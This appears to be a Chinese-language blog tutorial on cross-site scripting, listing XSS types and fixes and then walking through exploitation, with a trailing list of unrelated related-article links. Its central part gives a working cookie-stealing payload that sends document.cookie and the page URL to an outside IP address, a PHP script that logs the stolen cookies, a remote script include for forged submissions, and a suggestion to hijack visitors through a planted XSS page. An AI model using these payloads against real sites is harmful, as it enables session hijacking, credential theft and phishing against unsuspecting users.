XSS 跨站&Cookie 盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架

漏洞原理:接受输入数据,输出显示数据后解析执行
基础类型:反射 ( 非持续 ) ,存储 ( 持续 ) , DOM-BASE
拓展类型: jquery , mxss , uxss , pdfxss , flashxss ,上传 xss 等
常用标签: https://www.freebuf.com/articles/web/340080.html
攻击利用:盲打, COOKIE 盗取,凭据窃取,页面劫持,网络钓鱼,权限维持等
安全修复:字符过滤,实例化编码, http_only , CSP 防护, WAF 拦截等
测试流程:看输出想输入在哪里,更改输入代码看执行(标签,过滤决定)
#XSS 跨站 - 攻击利用 - 凭据盗取
条件:无防护 Cookie 凭据获取
利用: XSS 平台或手写接受代码
触发: <script>var
url='http://47.94.236.117/getcookie.php?u='+window.location.href+
'&c='+document.cookie;document.write("<img src="+url+"
/>");</script>
接受:
<?php
url=_GET['u'];
cookie=_GET['c'];
fp = fopen('cookie.txt',"a"); fwrite(fp,url."\|".cookie."\n");
fclose($fp);
?>
#XSS 跨站 - 攻击利用 - 数据提交
条件:熟悉后台业务功能数据包,利用 JS 写一个模拟提交
利用:凭据获取不到或有防护无法利用凭据进入时执行其他
然后再写<script src="http://xx.xxx.xxx/poc.js"></script>
也可以主动钓鱼 比如 在自己博客放xss语句 然后进行页面劫持

相关推荐
KillerNoBlood5 分钟前
2026移动端跨平台开发面经总结
android·算法·flutter·ios·移动开发·鸿蒙·kmp
霞姐聊IT6 分钟前
三大并发技术—进程、线程和协程
linux·运维·网络·操作系统
上海云盾-小余7 分钟前
UDP 反射放大攻击溯源:流量特征识别与分层封禁实战
网络·网络协议·udp
tjjingpan8 分钟前
HCIP-Datacom Core Technology V1.0_17 IP组播基础
网络
南境十里·墨染春水22 分钟前
linux学习进展 网络编程——HTTPS (补充)
linux·网络·学习
wangl_9223 分钟前
Wireshark 使用指南:从入门到高级分析
网络·网络协议·tcp/ip·测试工具·wireshark·modbus
消失的旧时光-194332 分钟前
Android / IoT 面试复盘总结:从 MQTT、TLS 到 JWT 权限体系(标准答案 + 工程理解 + 延伸知识链)
android·物联网·面试
pengyi87101543 分钟前
易代理分层IP池搭建,高并发业务弹性扩容方案
网络·网络协议·tcp/ip
mounter6251 小时前
深度解析 dmabuf/devmem:从图形渲染到 AI 与高性能网络的演进之路
linux·网络·人工智能·内存管理·kernel
wanhengidc1 小时前
服务器中的算力运行
运维·服务器·网络·安全·web安全